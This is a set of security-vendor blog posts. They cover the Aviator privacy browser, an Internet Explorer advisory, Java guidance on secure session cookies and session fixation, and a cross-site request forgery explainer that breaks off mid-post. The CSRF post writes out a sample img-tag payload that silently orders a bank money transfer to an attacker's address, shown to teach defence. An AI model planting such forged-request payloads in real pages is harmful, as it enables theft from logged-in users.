Aviator: Some Answered Questions

We publicly released Aviator on Monday, Oct 21. Since then we’ve received an avalanche of questions, suggestions, and feature requests regarding the browser. The level of positive feedback and support has been overwhelming. Lots of great ideas and comments that will help shape where we go from here. If you have something to share, a question or concern, please contact us at aviator@whitehatsec.com.

Now let’s address some of the most often heard questions so far:

Where’s the source code to Aviator?

WhiteHat Security is still in the very early stages of Aviator’s public release and we are gathering all feedback internally. We’ll be using this feedback to prioritize where our resources will be spent. Deciding whether or not to release the source code is part of these discussions.

Aviator utilizes open source software via Chromium; don’t you have to release the source?

WhiteHat Security respects and appreciates the open source software community. We’ve long supported various open source organizations and projects throughout our history. We also know how important OSS licenses are, so we diligently studied what would be required once Aviator was made publicly available.

Chromium, from which Aviator is derived, contains a wide variety of OSS licenses, as can be seen by visiting aviator://credits/ in Aviator or chrome://credits/ in Google Chrome. The portions of the code we modified in Aviator are all under BSD or BSD-like licenses. As such, publishing our changes is, strictly speaking, not a licensing requirement. This is not to say we won’t in the future, just that we’re discussing it internally first. Doing so is a big decision that shouldn’t be taken lightly. Of course, if and when we make a change to GPL or similarly licensed software in Chromium, we’ll happily publish the updates as required.

When is Aviator going to be available for Windows, Linux, iOS, Android, etc.?

Aviator was originally an internal project designed for WhiteHat Security employees. This served as a great environment to test our theories about how a truly secure and privacy-protecting browser should work. Since WhiteHat is primarily a Mac shop, we built it for OS X. Those outside of WhiteHat wanted to use the same browser that we did, so this week we made Aviator publicly available.

We are still in the very early days of making Aviator available to the public. The feedback so far has been very positive, and requests for Windows, Linux, and even open source versions are pouring in, so we are determining where to focus our resources next. There is no definite timeframe yet for when other versions will be available.

How long has WhiteHat been working on Aviator?

Browser security has been a subject of personal and professional interest for both me and Robert “RSnake” Hansen (Director, Product Management) for years. Both of us have discussed the risks of browser security around the world. A big part of the Aviator research was spent creating something to protect WhiteHat employees and the data they are responsible for. Outside of WhiteHat, many people ask us what browser we use. Individually our answer has been, “mine.” Now we can be more specific: that browser is Aviator, a browser we feel confident using not only for our own security and privacy, but one we can confidently recommend to family and friends when asked.

Browsers have pop up blockers to deal with ads. What is different about Aviator’s approach?

Popup blockers used to work wonders, but advertisers switched to sourcing in JavaScript and actually putting content on the page. They no longer have to physically create a new window because they can take over the entire page. Using Aviator, the user’s browser doesn’t even make the connection to an advertising network’s servers, so obnoxious or potentially dangerous ads simply don’t load.

Why isn’t the Aviator application binary signed?

During the initial phases of development we considered releasing Aviator as a beta through the Mac App Store. Browsers attempt to take advantage of the fastest method of rendering they can, and some of those methods rely on undocumented OS interfaces known as “private APIs.” Apple does not support these APIs because they may change, and Apple doesn’t want to be held accountable when things break. As a result, while Apple allows developers to use these undocumented, high-speed private APIs, it doesn’t allow them to distribute applications that use private APIs through the Mac App Store. We can only speculate that the reason is that users are likely to blame Apple, rather than the application, when things break. After about a month of wrestling with it, we decided that for now we’d avoid the Mac App Store. In the shuffle we didn’t continue signing the binaries as we had been. It was simply an oversight.

Why is Aviator’s application directory world-writable?

During development, all of our developers worked on dedicated computers rather than shared ones, so there was no need to hide data from one another, and file permissions became too lax as source files were copied and edited. This wouldn’t have been an issue if the permissions had been changed back to a less permissive state before release, but that step was missed. We will get it fixed in an upcoming release.

Update: November 8, 2013:
Our dev team analyzed the overly permissive chmod settings that Aviator 1.1 shipped with, agreed they were a problem, and fixed the issue to bring the permissions more in line with existing browsers and protect users on multi-user systems. Click to read more on our Aviator Browser 1.2 Beta release.

Does Aviator support Chrome extensions?

Yes, all Chrome extensions should function under Aviator. If an issue comes up, please report it to aviator@whitehatsec.com so we can investigate.

Wait a minute: first you say, “if you aren’t paying you are the product,” then you offer a free browser?

Fair point. As we’ve said, Aviator started off as an internal project simply to protect WhiteHat employees and is not an official company “product.” Those outside the company asked if they could use the same browser that we do; Aviator is our answer to that. Since we’re not in the advertising and tracking business, how could we say no? At some point in the future we’ll figure out a way to generate revenue from Aviator, but in the meantime, we’re mostly interested in offering a browser that security- and privacy-conscious people want to use.

Have you gotten any feedback from the major browser vendors about Aviator? If so, what has it been?

We have not received any official feedback from any of the major browser vendors, though there has been some feedback from various employees of those vendors shared informally over Twitter. Some of it has been positive, some negative. In either case, we’re most interested in serving the everyday consumer.

Keep the questions and feedback coming and we will continue to endeavor to improve Aviator in ways that will be beneficial to the security community and to the average consumer.

What’s the Difference between Aviator and Chromium / Google Chrome?

Context:

It’s a fundamental rule of Web security: a Web browser must be able to defend itself against a hostile website. Presently, in our opinion, the market-share-leading browsers cannot do this adequately. This is an everyday threat to the personal security and privacy of the more than one billion people online, ourselves included. We’ve long held and shared this point of view at WhiteHat Security. Like any sufficiently large company, we have many internal staff members who aren’t as tech savvy as WhiteHat’s Threat Research Center, so we had the same kind of security problem as the rest of the industry: we had to rely on educating our users, because no browser on the market was suitable for our security needs. But education is a flawed approach – there are always new users and new security guidelines. So instead of engaging in a lengthy educational campaign, we began designing an internal browser that would be secure and privacy-protecting enough for our own users — by default. Over the years a great many people — friends, family members, and colleagues alike — have asked us what browser we recommend, or even what browser their children should use. Aviator became our answer.

Why Aviator:

The attacks a website can generate against a visiting browser are diverse and complex, but can be broadly categorized in two types. The first type of attack is designed to escape the confines of the browser walls and infect the desktop with malware. Today’s top tier browser defenses include software security in the browser core, an accompanying sandbox, URL blacklists, silent updates, and plug-in click-to-play. Well-known browser vendors have done a great job in this regard and should be commended. No one wins when users’ desktops become part of a botnet.

Unfortunately, the second type of browser attack has been left largely undefended. These attacks are pernicious and carry out their exploits within the browser walls. They typically don’t implant malware, but they are indeed hazardous to online security and privacy. I’ve previously written up a lengthy 8-part blog post series on the subject documenting the problems. For a variety of reasons, these issues have not been addressed by the leading browser vendors. Rather than continue asking for updates that would likely never come, we decided we could do it ourselves.

To create Aviator we leveraged open source Chromium, the same browser core used by Google Chrome. Then, because Chromium’s BSD license allows it, we made many very particular changes to the code and configuration to enhance security and privacy. We named our product Aviator. Many people are eager to learn what exactly the differences are, so let’s go over them.

Differences:

  1. Protected Mode (Incognito Mode) / Not Protected Mode:
    TL;DR All Web history, cache, cookies, auto-complete, and local storage data is deleted after restart.
    Most people are unaware that there are 12 or more locations where websites may store cookie and cookie-like data in a browser. Cookies are typically used to track your surfing habits from one website to the next, but they also expose your online activity to nosy people with access to your computer. Protected Mode purges these storage areas automatically with each browser restart. While other browsers have this feature or something similar, it is not enabled by default, which can make it a chore to use. Aviator launches directly into Protected Mode by default and clearly indicates the mode of the current window. The security / privacy side effect of Protected Mode also helps protect against browser auto-complete hacking, login detection, and deanonymization via clickjacking by reducing the number of session states you have open – due to an intentional lack of persistence in the browser across sessions.
  2. Connection Control: 
    TL;DR Rules for controlling the connections made by Aviator. By default, Aviator blocks Intranet IP-addresses (RFC1918).
    When you visit a website, it can instruct your browser to make potentially dangerous connections to internal IP addresses on your network — addresses that could not otherwise be reached from the outside (NAT). Exploitation may lead to simple reconnaissance of internal networks, or it may permanently compromise your network by overwriting the firmware on the router. Without installing special third-party software, it’s impossible in other browsers to block a bit of Web code from carrying out browser-based intranet hacking. If Aviator happens to be blocking something you want to be able to get to, Connection Control allows you to create custom rules — or temporarily use another browser. (A rough sketch of the kind of address check involved appears after this list.)
  3. Disconnect bundled (Disconnect.me): 
    TL;DR Blocks ads and 3rd-party trackers.

    Essentially every ad on every website your browser encounters is tracking you, storing bits of information about where you go and what you do. These ads, along with invisible 3rd-party trackers, also often carry malware designed to exploit your browser when you load a page, or to try to trick you into installing something should you choose to click on it. Since ads can be authored by anyone, including attackers, both ads and trackers may also harness your browser to hack other systems, hack your intranet, incriminate you, etc. Then of course the visuals in the ads themselves are often distasteful, offensive, and inappropriate, especially for children. To help protect against tracking, login detection and deanonymization, auto cross-site scripting, drive-by-downloads, and evil cross-site request forgery delivered through malicious ads, we bundled in the Disconnect extension, which is specifically designed to block ads and trackers. According to the Chrome web store, over 400,000 people are already using Disconnect to protect their privacy. Whether you use Aviator or not, we recommend that you use Disconnect too (Chrome / Firefox supported). We understand many publishers depend on advertising to fund the content. They also must understand that many who use ad blocking software aren’t necessarily anti-advertising, but more pro security and privacy. Ads are dangerous. Publishers should simply ask visitors to enable ads on the website to support the content they want to see, which Disconnect’s icon makes it easy to do with a couple of mouse-clicks. This puts the power and the choice into the hands of the user, which is where we believe it should be.
  4. Block 3rd-party Cookies: 
    TL;DR Default configuration update. 

    While it’s very nice that cookies, including 3rd-party cookies, are deleted when the browser is closed, it’s even better when 3rd-party cookies are not allowed in the first place. Blocking 3rd-party cookies helps protect against tracking, login detection, and deanonymization during the current browser session.
  5. DuckDuckGo replaces Google search: 
    TL;DR Privacy enhanced replacement for the default search engine. 

    It is well known that Google search makes the company billions of dollars annually via advertising and user tracking / profiling. DuckDuckGo promises exactly the opposite: “Search anonymously. Find instantly.” We felt that was a much better default option. Of course, if you prefer another search engine (including Google), you are free to change the setting.
  6. Limit Referer Leaks: 
    TL;DR Referers no longer leak cross-domain, but are only sent same-domain by default. 

    When clicking from one link to the next, browsers tell the destination website where the click came from via the Referer header (intentionally misspelled). Doing so can leak sensitive information carried in the referring URL, such as search keywords, internal IPs/hostnames, and session tokens, and it offers little, if any, benefit to the user. Aviator therefore only sends Referer headers within the same domain.
  7. Plug-Ins Click-to-Play: 
    TL;DR Default configuration update: click-to-play is enabled by default.

    Plug-ins (e.g. Flash and Java) are a source of tracking, malware exploitation, and general annoyance. Plug-ins often keep their own storage for cookie-like data, which isn’t easy to delete, especially from within the browser. Plug-ins are also a huge attack vector for malware infection: your browser might be secure, but plug-ins often are not, and they must be updated constantly. Then of course there are all the annoying sounds and visuals made by plug-ins, which are difficult to identify and block once they load. So, we blocked them all by default. When you want to run a plug-in, say on YouTube, just click once on the puzzle piece. If you want a website to always load plug-ins, that’s a simple configuration change as well (“Always allow plug-ins on…”).
  8. Limit data leakage to Google: 
    TL;DR Default configuration update.

    In Aviator we’ve disabled “Use a web service to help resolve navigation errors” and “Use a prediction service to help complete searches and URLs typed in the address bar” by default. We also removed all options to sync / log in to Google, as well as the tracking traffic sent to Google upon Chromium installation. For many of the same reasons that we defaulted to DuckDuckGo as the search engine, we have limited what the browser sends to Google in order to protect your privacy. If you choose to use Google services, that is your choice. If you choose not to, though, that can be difficult in some browsers. Again, our mantra is choice – and this gives you the choice.
  9. Do Not Track: 
    TL;DR Default configuration update.

    Enabled by default. While we prefer “Can-Not-Track” to “Do-Not-Track,” we figured it was safe enough to enable the “Do Not Track” signal by default in the event it gains traction.
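
As promised in the Connection Control item above, here is a rough illustration of the kind of address check such a feature has to make. Aviator’s actual implementation lives inside Chromium’s networking code; this is only a minimal, hypothetical Java sketch (the class and method names are ours) of how a destination host can be classified as internal:

import java.net.InetAddress;
import java.net.UnknownHostException;

public class Rfc1918Check {

    // True if the host resolves to a private (RFC1918), loopback, or link-local address.
    public static boolean isInternalAddress(String host) {
        try {
            InetAddress addr = InetAddress.getByName(host);
            return addr.isSiteLocalAddress()   // 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16
                || addr.isLoopbackAddress()    // 127.0.0.0/8
                || addr.isLinkLocalAddress();  // 169.254.0.0/16
        } catch (UnknownHostException e) {
            return false;  // unresolvable hosts are handled elsewhere
        }
    }
}

A browser applying a rule like this would refuse the request, or prompt the user, whenever a public website tries to reach an address the check flags as internal.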

So far we have appreciated the response to WhiteHat Aviator and we welcome additional questions and feedback. Our goal is to continue to make this a better and more secure browser option for consumers. Please continue to spread the word and share your thoughts with us. Please download it and give it a test run. Let us know what you think! Click here to learn more about the Aviator browser.

Introducing WhiteHat Aviator – A Safer Web Browser

Jeremiah Grossman and I have been publicly discussing browser security and privacy, or the lack thereof, for many years. We’ve shared the issues hundreds of times at conferences, in blog posts, on Twitter, in white papers, and in the press. As the adage goes, “If you’re not paying for something, you’re not the customer; you’re the product being sold.” Browsers are no different, and the major vendors (Google, Mozilla, Microsoft) simply don’t want to make the changes necessary to offer a satisfactorily secure and private browser.

Before I go any further, it’s important to understand that it’s NOT that the browser vendors (Google, Mozilla, and Microsoft) don’t grasp or appreciate what plagues their software. They understand the issues quite well. Most of the time they actually nod their heads and even agree with us! This naturally invites the question: “why aren’t the necessary changes made to fix things and protect people?”

The answer is simple. Browser vendors (Google, Mozilla, and Microsoft) choose not to make these changes because doing so would run the risk of hurting their market share and their ability to make money. You see, offering what we believe is a reasonably secure and privacy-protecting browser requires breaking the Web, even though it’s just a little and in ways few people would notice. As just one example of many, let’s discuss the removal of ads.

The online advertising industry is promoted as a means of helping businesses reach an interested target audience. But tens of millions of people find these ads to be annoying at best, and many find them highly objectionable. The targeting and the assumptions behind them are often at fault: children may be exposed to ads for adult sites, and the targeting is often based on bias and stereotypes that can cause offense. Moreover, these ads can be used to track you across the web, are often laden with malware, and can point those who click on them to scams.

One would think that people who don’t want to click on ads are not the kind of people the ad industry wants anyway. So if browser vendors offered a feature capable of blocking ads by default, it would increase the user satisfaction for millions, provide a more secure and privacy-protecting online experience, and ensure that advertisements were seen by people who would react positively, rather than negatively, to the ads. And yet not a single browser vendor offers ad blocking, instead relying on optional third-party plugins, because this breaks their business model and how they make money. Current incentives between the user and browser vendor are misaligned. People simply aren’t safe online when their browser vendor profits from ads.

I could go on and give a dozen more examples like this, but rather than continuing to beat a drum that no one with the power to make the change is willing to listen to – we decided it was time to draw a line in the sand, and to start making the Web work the way we think it should: a way that protects people. That said, I want to share publicly for the first time some details about WhiteHat Aviator, our own full-featured web browser, which was until now a top secret internal project from our WhiteHat Security Labs team. Originally, Aviator started out as an experiment by our Labs team to test our many Web security and privacy theories, but today Aviator is the browser given to all WhiteHat employees. Jeremiah, myself, and many others at WhiteHat use Aviator daily as our primary browser. We’re often asked by those outside the company what browser we use, to which we have answered, “our own.” After years of research, development, and testing we’ve finally arrived at a version that’s mature enough for public consumption (OS X). Now you can use the same browser that we do.

WhiteHat Security has no interest or stake in the online advertising industry, so we can offer a browser free of ulterior motives. What you see is what you get. We aren’t interested in tracking you or your browsing history, or in letting anyone else have that information either.

Aviator is designed for the everyday person who really values their online security and privacy:

  • We bundled Aviator with Disconnect to remove ads and tracking
  • Aviator is always in private mode
  • Each tab is sandboxed (a sandbox provides controls to help prevent one program from making changes to others, or to your environment)
  • We strip out referring URLs across domains to protect your privacy
  • Flash and Java are click-to-play – greatly reducing the risk of drive-by downloads
  • We block access to websites behind your firewall to prevent Intranet hacking

Default settings in Aviator are set to protect your security and your privacy.

We hope you enjoy using Aviator as much as we’ve enjoyed building it. If people like it, we will create a Windows version as well and we’ll add additional privacy and security features. Please download it and give it a test run. Let us know what you think! Click here to learn more about the Aviator browser.

Browser Wars to Browser Foes – MS13-069

Microsoft has just published a high-severity 0-day vulnerability affecting all versions of Internet Explorer 6.0 and greater on all operating systems higher than Windows XP Service Pack 3. This vulnerability uses a corrupted memory object to remotely execute code on the victim’s machine with the current user’s privileges. More information about how the vulnerability is exploited is available from Microsoft here.

All that is required for the victim to be exploited is to click a malicious link hosted by the attacker; this in turn runs the attacker’s code and gives the attacker access to the machine.

This attack can be delivered through social media sites, chat messages, email, and malicious websites. As a precaution it may be wise to change the default browser to something other than Internet Explorer until the affected machine is patched. Microsoft’s instructions for changing the default browser are here: Windows 7 and Windows XP.

The scope of users affected is very large, since Microsoft Windows and Internet Explorer have been the de facto standard for more than a decade. Because Internet Explorer ships as the only browser in Windows, it’s very easy never to bother installing a different one. Internet Explorer still accounts for roughly a third of browser usage when compared with Chrome and Firefox.

Internet Explorer on Windows Server versions above 2003 is at lower risk because it runs in an enhanced security configuration by default, and browsing the Internet from a Windows server (or any server, for that matter) is strongly discouraged anyway.

Solution:

Patching can be a hectic task for admins whose environments depend on Internet Explorer, but it should be done immediately to prevent exposure.

The official instructions from Microsoft (Suggested Actions):

General Information for all users

Enhanced Mitigation Experience ToolKit

Here are some statistics showing browser and operating system usage across the world:

https://www.statcounter.com

https://www.netmarketshare.com

https://www.w3counter.com

https://www.sitepoint.com


20,000

20,000. That’s the number of websites we’ve assessed for vulnerabilities with WhiteHat Sentinel. Just saying that number alone really doesn’t do it any justice though. The milestone doesn’t capture the gravity and importance of the accomplishment, nor does it fully articulate everything that goes into that number, and what it took to get here. As I reflect on 20,000 websites, I think back to the very early days when so many people told us our model could never work, that we’d never see 1,000 sites, let alone 20x that number. (By the way, I remember their names distinctly ;).) In fairness, what they couldn’t fully appreciate then was what it really takes to scale “Web security,” which means they didn’t truly understand Web security.

When WhiteHat Security first started back in late 2001, consultants dominated the vulnerability assessment space. If a website was [legally] tested for vulnerabilities, it was done by an independent third party. A consultant would spend roughly a week per website, scanning, prodding around, modifying cookies, URLs and hidden form fields, and then finally deliver a stylized PDF report documenting their findings (aka “the annual assessment”). A fully billed consultant might be able to comprehensively test 40 individual websites per year, and the largest firms would have maybe as many as 50 consultants. So collectively, such a firm could only get to about 2,000 websites annually. This is FAR shy of just the 1.8 million SSL-serving sites on the Web. This exposed an unacceptable limitation of their business model.

WhiteHat, at the time of this writing, handles 10x the workload of any consulting firm we’re aware of, and we’re nowhere near capacity. Not only that, WhiteHat Sentinel is assessing these 20,000 websites on a roughly weekly basis, not just once a year! That’s orders of magnitude more security value delivered than what one-time assessments can possibly provide. Remember, the Web is a REALLY big place, like 700 million websites big in total. And that right there is what Web security is all about: scale. If any solution is unable to scale, it’s not a Web security solution. It’s a one-off. It might be a perfectly acceptable one-off, but a one-off nonetheless.

Achieving scalability in Web security must take into account the holy trinity, a symbiotic combination of People, Process, and Technology – in that order. No [scalable] Web security solution I’m aware of can exist without all three. Not developer training, not threat modeling, not security in QA, not Web application firewalls, not centralized security controls, and certainly not vulnerability assessment. Nothing. No technological innovation can replace the need for the other two factors. The best we can expect of technology is to increase the efficiency of people and processes. We’ve understood this at WhiteHat Security since day one, and it’s one of the biggest reasons WhiteHat Security continues to grow and be successful where many others have gone by the wayside.

Over the years, while the vulnerabilities themselves have not really changed much, Web security culture definitely has. As the industry matures and grows, and awareness builds, we see the average level of Web security competency decrease! This is something to be expected. The industry is no longer dominated by a small circle of “elites.” Today, most in this field are beginners, with 0 – 3 years of work experience, and this is a very good sign.

That said, there is still a huge skill and talent debt everyone must be mindful of. So the question is: in the labor force ecosystem, who is in the best position to hire, train, and retain Web security talent – particularly the Breaker (vulnerability finders) variety – security vendors or enterprises? Since vulnerability assessment is not and should not be in most enterprises’ core competency, AND the market is highly competitive for talent, we believe the clear answer is the former. This is why we’ve invested so greatly in our Threat Research Center (TRC) – our very own professional Web hacker army.

We started building our TRC more than a decade ago, recruiting and training some of the best and brightest minds, many of whom have now joined the ranks of the Web security elite. We pride ourselves on offering our customers not only a very powerful and scalable solution, but also an “army of hackers” – more than 100 strong and growing – that is at the ready, 24×7, to hack them first. “Hack Yourself First” is a motto that we share proudly, so our customers can be made aware of the vulnerabilities that exist on their sites and can fix them before the bad guys exploit them.

That is why crossing the threshold of 20,000 websites under management is so impressive. We have the opportunity to assess all these websites in production – as they are constantly updating and changing – on a continuous basis. This arms our team of security researchers with the latest vulnerability data for testing and measuring and ultimately protecting our customers.

Other vendors could spend millions of dollars building the next great technology over the next 18 months, but they cannot build an army of hackers in 18 months; it just cannot be done. Our research and development department is constantly working on ways to improve our methods of finding vulnerabilities, whether with our scanner or by understanding business logic vulnerabilities. They’re also constantly updated with new 0-days and other vulnerabilities that we try to incorporate into our testing. These are skills that take time to cultivate and strengthen and we have taken years to do just that.

So, I have to wonder: what will 200,000 websites under management look like? It’s hard to know, really. We had no idea 10+ years ago what getting to 20,000 would look like, and we certainly never would have guessed that it would mean we would be processing more than 7TB of data over millions of dollars of infrastructure per week. That said, given the speed at which the Internet is growing and the speed at which we are growing with it, we could reach 200,000 sites in the next 18 months. And that is a very exciting possibility.

WhiteHat to Host Webinar—Beyond the Breach: Insights Into the Hidden Cost of a Web Security Breach

On Wednesday, September 12, at 11:00 AM PT, join WhiteHat Security’s Gillis Jones as he shares his research into the real financial implications of a website hack. On his journey through the business side of Web security, Gillis uncovered bleak realities, including discrepancies in accounting practices, a lack of consistent disclosure policies to address Web hacks, and gross under-reporting of financial losses once a breach is disclosed.

Gillis will also share cost-analysis formulas he developed while researching website breaches, as well as the specific costs of a breach in each of these areas:

  1. Personnel
  2. Technical, Infrastructure & Immediate Losses of Income
  3. Compliance
  4. Damaged, Destroyed or Stolen Hardware
  5. Customer Turnover & Loss of Customer Trust
  6. “Customer Management” After the Breach
  7. Fines & Lawsuits
  8. Public Relations “Damage Control”

To register for the webinar, please visit this link: https://reg.whitehatsec.com/forms/WEBINARbreach0912

Session Cookie Secure Flag Java

What is it and why should I care?
Session cookies (or, to Java folks, the cookie containing the JSESSIONID) are the cookies used to perform session management for Web applications. These cookies hold the reference to the session identifier for a given user, and the same identifier is maintained server-side along with any session-scoped data related to that session id. Because cookies are transmitted on every request, they are the most common mechanism used for session management in Web applications.

The secure flag is an additional attribute you can set on a cookie to instruct the browser to send that cookie ONLY over encrypted HTTPS connections (i.e., NEVER over unencrypted HTTP). This ensures that your session cookie is not visible to an attacker in, for instance, a man-in-the-middle (MITM) attack. While the secure flag is not a complete solution for secure session management, it is an important step in providing the security required.

What should I do about it?
The resolution here is quite simple. You must add the secure flag to your session cookie (and preferably to all cookies, because any requests to your site should be HTTPS, if possible).

Here’s how the session cookie might be set by the server (in the Set-Cookie response header) without the secure flag:

Set-Cookie: JSESSIONID=AS348AF929FK219CKA9FK3B79870H;

And here is the same session cookie with the secure flag:

Set-Cookie: JSESSIONID=AS348AF929FK219CKA9FK3B79870H; Secure;

Not much to it. Obviously, you can do this manually, but if you’re working in a Java Servlet 3.0 or newer environment, a simple configuration setting in the web.xml will take care of this for you. You should add the snippet below to your web.xml.

<session-config>
    <cookie-config>
        <secure>true</secure>
    </cookie-config>
</session-config>
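
If you would rather set this in code than in web.xml, Servlet 3.0 also exposes the same setting programmatically through SessionCookieConfig. A minimal sketch (the listener class name is ours):

import javax.servlet.ServletContextEvent;
import javax.servlet.ServletContextListener;
import javax.servlet.SessionCookieConfig;
import javax.servlet.annotation.WebListener;

@WebListener
public class SecureSessionCookieListener implements ServletContextListener {

    @Override
    public void contextInitialized(ServletContextEvent sce) {
        SessionCookieConfig config = sce.getServletContext().getSessionCookieConfig();
        config.setSecure(true);    // only send the JSESSIONID cookie over HTTPS
        config.setHttpOnly(true);  // optional, but also hides the cookie from JavaScript
    }

    @Override
    public void contextDestroyed(ServletContextEvent sce) { }
}

Either approach produces the same Set-Cookie header shown above.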

As you can see, resolving this issue is quite simple. It should be on everyone’s //TODO list.

References
———–
http://blog.mozilla.com/webappsec/2011/03/31/enabling-browser-security-in-web-applications/

http://michael-coates.blogspot.com/2011/03/enabling-browser-security-in-web.html

https://www.owasp.org/index.php/SecureFlag

Session Fixation Prevention in Java

What is it and why should I care?
Session fixation, by most definitions, is a subclass of session hijacking. The most common basic flow is:

Step 1. Attacker gets a valid session ID from an application
Step 2. Attacker forces the victim to use that same session ID
Step 3. Attacker now knows the session ID that the victim is using and can gain access to the victim’s account

Step 2, which requires forcing the session ID on the victim, is the only real work the attacker needs to do. And even this action on the attacker’s part is often performed by simply sending the victim a link to a website with the session ID attached to the URL.

Obviously, one user being able to take over another user’s account is a serious issue, so…

What should I do about it?
Fortunately, resolving session fixation is usually fairly simple. The basic advice is:

Invalidate the user session once a successful login has occurred.

The usual basic flow to handle session fixation prevention looks like:

1. User enters correct credentials
2. System successfully authenticates user
3. Any existing session information that needs to be retained is moved to temporary location
4. Session is invalidated (HttpSession#invalidate())
5. New session is created (new session ID)
6. Any temporary data is restored to new session
7. User goes to successful login landing page using new session ID
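
Here is a minimal sketch of steps 3 through 6 in plain Servlet terms; call it from your login code once the credentials have checked out (the class and method names are ours):

import java.util.Enumeration;
import java.util.HashMap;
import java.util.Map;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpSession;

public class SessionFixationGuard {

    // Invalidate the old (possibly attacker-chosen) session and move its data to a fresh one.
    public static HttpSession renewSession(HttpServletRequest request) {
        Map<String, Object> retained = new HashMap<String, Object>();
        HttpSession oldSession = request.getSession(false);
        if (oldSession != null) {
            Enumeration<String> names = oldSession.getAttributeNames();
            while (names.hasMoreElements()) {
                String name = names.nextElement();
                retained.put(name, oldSession.getAttribute(name));      // step 3: stash data
            }
            oldSession.invalidate();                                    // step 4: old session ID dies
        }
        HttpSession newSession = request.getSession(true);              // step 5: new session, new ID
        for (Map.Entry<String, Object> entry : retained.entrySet()) {
            newSession.setAttribute(entry.getKey(), entry.getValue());  // step 6: restore data
        }
        return newSession;
    }
}

If your container supports Servlet 3.1 or newer, HttpServletRequest.changeSessionId() accomplishes the ID rotation in a single call.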

A useful snippet of code is available from the ESAPI project that shows how to change the session identifier:

http://code.google.com/p/owasp-esapi-java/source/browse/trunk/src/main/java/org/owasp/esapi/reference/DefaultHTTPUtilities.java (look at the changeSessionIdentifier method)

There are other activities that you also can perform to provide additional assurance against session fixation. A number are listed below:

1. Check for session fixation if a user tries to log in using a session ID that has been specifically invalidated (requires maintaining this list in some type of LRU cache; a rough sketch follows this list)

2. Check for session fixation if a user tries to use an existing session ID already in use from another IP address (requires maintaining this data in some type of map)

3. If you notice these types of obvious malicious behavior, consider using something like AppSensor to protect your app, and to be aware of the attack
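
For the first check above, the “LRU cache” of deliberately invalidated session IDs can be as simple as a bounded LinkedHashMap. This is only a hypothetical sketch; the class name and size limit are ours:

import java.util.Collections;
import java.util.LinkedHashMap;
import java.util.Map;

public class InvalidatedSessionCache {

    private static final int MAX_ENTRIES = 10000;

    // LinkedHashMap in access order plus removeEldestEntry gives a simple bounded LRU store.
    private final Map<String, Boolean> invalidatedIds = Collections.synchronizedMap(
        new LinkedHashMap<String, Boolean>(MAX_ENTRIES, 0.75f, true) {
            @Override
            protected boolean removeEldestEntry(Map.Entry<String, Boolean> eldest) {
                return size() > MAX_ENTRIES;
            }
        });

    // Record a session ID at the moment you invalidate it (e.g., in the renewSession sketch above).
    public void recordInvalidation(String sessionId) {
        invalidatedIds.put(sessionId, Boolean.TRUE);
    }

    // True if a login attempt arrives riding on a session ID we deliberately killed.
    public boolean isSuspicious(String sessionId) {
        return invalidatedIds.containsKey(sessionId);
    }
}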

As you can see, session fixation is a serious issue, but has a pretty simple solution. Your best bet if possible is to include an appropriate solution in some “enterprise” framework (like ESAPI) so this solution applies evenly to all your applications.

References
———–
https://www.owasp.org/index.php/Session_fixation

http://www.acros.si/papers/session_fixation.pdf

http://cwe.mitre.org/data/definitions/384.html

http://projects.webappsec.org/w/page/13246960/Session%20Fixation

Cross-Site Request…Framing?

I admit, the title of this post is deliberately misleading. It’s really about Cross-Site Request Forgery (CSRF), but it does involve framing − just not the kind that you might be expecting.

Before jumping into the meat of things, let’s start off with an appetizer: What is Cross-Site Request Forgery? Rather than give you the “textbook” definition, I’ll just dive right into a real-world example.

Let’s say you visit http://www.news.test, and there is a logo on the homepage. Let’s also say that the logo is hosted at this address: http://images.example.com/newsLogo.jpg

When your browser loads the page at http://www.news.test, it’s likely you’ll see an image tag similar to the following: <img src="http://images.example.com/newsLogo.jpg" />. When your browser renders that image, it must first place a request to images.example.com in order to retrieve the newsLogo.jpg resource. There’s certainly no harm in this, but for the sake of argument, we can confidently conclude that the www.news.test website forced your browser to place a request to images.example.com without your knowledge or explicit consent. Right?

Now, let’s suppose you visit http://www.news.test again, but this time there is an image tag that looks like this: <img src="http://yourbanksite.example.org/transferMoney.php?toEmail=attacker@attacker.example.net&amount=99999.00" />. As in the example above, when your browser loads the page at www.news.test and attempts to render the image tag, it is going to place a request to http://yourbanksite.example.org/transferMoney.php?toEmail=attacker@attacker.example.net&amount=99999.00. Your browser will place the malicious request without your knowledge, and if you are authenticated to yourbanksite.example.org when you visit www.news.test − assuming the yourbanksite.example.org web application is not protecting against a CSRF attack − your life savings and kid’s college fund will be gone in a flash.

This kind of attack succeeds because of a flaw in how the Internet inherently works. When your browser places a request to another site, any cookies that exist for that site are sent along with that request. Since authentication is typically handled through cookies, and your cookies are sent along with the malicious yourbanksite.example.org request, the yourbanksite.example.org application is going to see the request, recognize it as coming from an authenticated user (you), and thus honor/process the request.

There are more things to consider in this type of attack, but for the scope of this post, that’s all you really need to know now. While a CSRF attack is typically used to exploit an application that the victim is authenticated to, for the sake of what I’ll be discussing below, I’m more interested in the fact that a CSRF attack can be leveraged to force a victim’s browser to place arbitrary requests.

For additional reading material on CSRF, see this post on WhiteHat’s stance on CSRF, and the Web Application Security Consortium’s page on CSRF.

Ok… appetizer digested? Now for the main course…

Information is everything. It’s power. Privacy within Web applications, especially social media applications, is a war zone because information is such a profitable and appealing target. The smallest pieces of information − or *mis*information − in the wrong hands can cost you your identity, your job, or even your freedom.

Wherever there is a massive data flow of information, there is inevitably going to be monitoring and tracking. From advertising networks, to law enforcement organizations, to intelligence agencies, there is no shortage of people who are interested in obtaining information about you. I’m not just talking about your personal information, such as name, address, and phone number; I’m also referring to your browsing history, your social network engagements, and the kind of content you publish to, and consume from, “the cloud”.

Imagine your spouse or your boss opening up your browser’s history. Would you be concerned about what he/she sees?  Or perhaps the FBI confiscates your computer without warning.  Would you be worried about what they’d find?  Hopefully, the answer to both of those questions is “No”. But what if there was enough incriminating browser activity that you lose your job? Or a warrant is issued for your arrest? Or you even get labeled an “enemy combatant”?

Sounds kind of absurd, right? Well, how else would you explain your Google searches for “homemade explosives” and “President Obama upcoming trips”? Or your visits to underground child sex trafficking sites? Or your posts made to pro-Al Qaeda message forums? It would seem like you’ve been up to a whole lot of no good!

